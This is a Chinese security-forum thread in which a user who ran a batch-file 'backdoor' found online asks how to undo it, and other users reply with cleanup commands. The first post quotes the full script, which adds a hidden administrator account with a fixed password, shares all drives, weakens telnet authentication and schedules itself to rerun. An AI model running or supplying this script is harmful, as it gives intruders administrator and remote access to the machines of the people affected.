自已运行小后门，中招了，求助~~~ - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 入侵防御（HIPS）自已运行小后门，中招了，求助~~~

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

自已运行小后门，中招了，求助~~~

漠然5 初生襁褓狮帖子:10 注册: 2009-10-18 来自:	发表于： 2009-10-26 07:12 \| 只看楼主短消息资料字号：小中大 1楼自已运行小后门，中招了，求助~~~ 无意中在网上看到个批处理的小后门，觉得挺有意思的``就把它存了起来``` 今天不小心运行了~~ 所有磁盘都被共享出来了，而且无法关闭，请大手支招 …… 感谢~ 对了，代码如下 @echo off @attrib +s + r abc.bat @net user abc 12345678 /add @net localgroup administrators abc /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share g$=g: @net share h$=h: @tlntadmn config sec = -ntlm @net stop schedule @net start Schedule @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\abc.bat @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\abc.bat @at 11:05 c:\WINNT\SYSTEM32\abc.bat @at 23:05 c:\WINNT\SYSTEM32\abc.bat @net stop telnet @net start telnet @exit 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; CIBA)
漠然5 初生襁褓狮帖子:10 注册: 2009-10-18 来自:	分享到：

zg1_2004 禁止访问帖子:6782 注册: 2004-01-22 来自:	发表于： 2009-10-26 09:26 \| 短消息资料字号：小中大 2楼回复：自已运行小后门，中招了，求助~~~ 该用户帖子内容已被屏蔽
zg1_2004 禁止访问帖子:6782 注册: 2004-01-22 来自:

asdkfmasdfiaskdi 禁止访问帖子:20 注册: 2009-11-30 来自:	发表于： 2009-11-30 14:55 \| 短消息资料字号：小中大 3楼回复：自已运行小后门，中招了，求助~~~ 该用户帖子内容已被屏蔽
asdkfmasdfiaskdi 禁止访问帖子:20 注册: 2009-11-30 来自:

龚万兵禁止访问帖子:63 注册: 2008-08-29 来自:	发表于： 2010-01-26 18:24 \| 短消息资料字号：小中大 4楼回复 3F asdkfmasdfiaskdi 的帖子该用户帖子内容已被屏蔽
龚万兵禁止访问帖子:63 注册: 2008-08-29 来自:

fengxingjudy 快乐黄口狮帖子:184 注册: 2010-01-12 来自:	发表于： 2010-01-27 22:52 \| 短消息资料字号：小中大 5楼回复：自已运行小后门，中招了，求助~~~ 用360或者瑞星上网助手，扫描一下就会报出这些弱点吧，然后跟着提示关掉就哦了。我觉得，没具体遇到过这个问题，遇到过类似的。
fengxingjudy 快乐黄口狮帖子:184 注册: 2010-01-12 来自:

jks_风锋芒艾服狮帖子:2235 注册: 2009-12-17 来自:China	发表于： 2010-01-28 20:34 \| 短消息资料字号：小中大 6楼回复：自已运行小后门，中招了，求助~~~ 直接cmd-- net share IPC$ /del 依次类推就可以了，要是不行的话再来论坛求救吧
jks_风锋芒艾服狮帖子:2235 注册: 2009-12-17 来自:China

jks_风锋芒艾服狮帖子:2235 注册: 2009-12-17 来自:China	发表于： 2010-01-28 20:36 \| 短消息资料字号：小中大 7楼回复：自已运行小后门，中招了，求助~~~ 刚才又看到了一句， @net stop telnet @net start telnet 这两句是开启telnet的服务，不过你设置了复杂的密码的话也是没什么大事的，XP默认是禁用的，你最好也是禁用了此服务。
jks_风锋芒艾服狮帖子:2235 注册: 2009-12-17 来自:China

完颜无泪快乐黄口狮帖子:195 注册: 2010-01-02 来自:	发表于： 2010-02-01 11:14 \| 短消息资料字号：小中大 8楼回复：自已运行小后门，中招了，求助~~~ attrib -s - r abc.bat net user abc delete net share IPC$ /del net stop schedule net start telnet del abc.bat 应该就可以了
完颜无泪快乐黄口狮帖子:195 注册: 2010-01-02 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT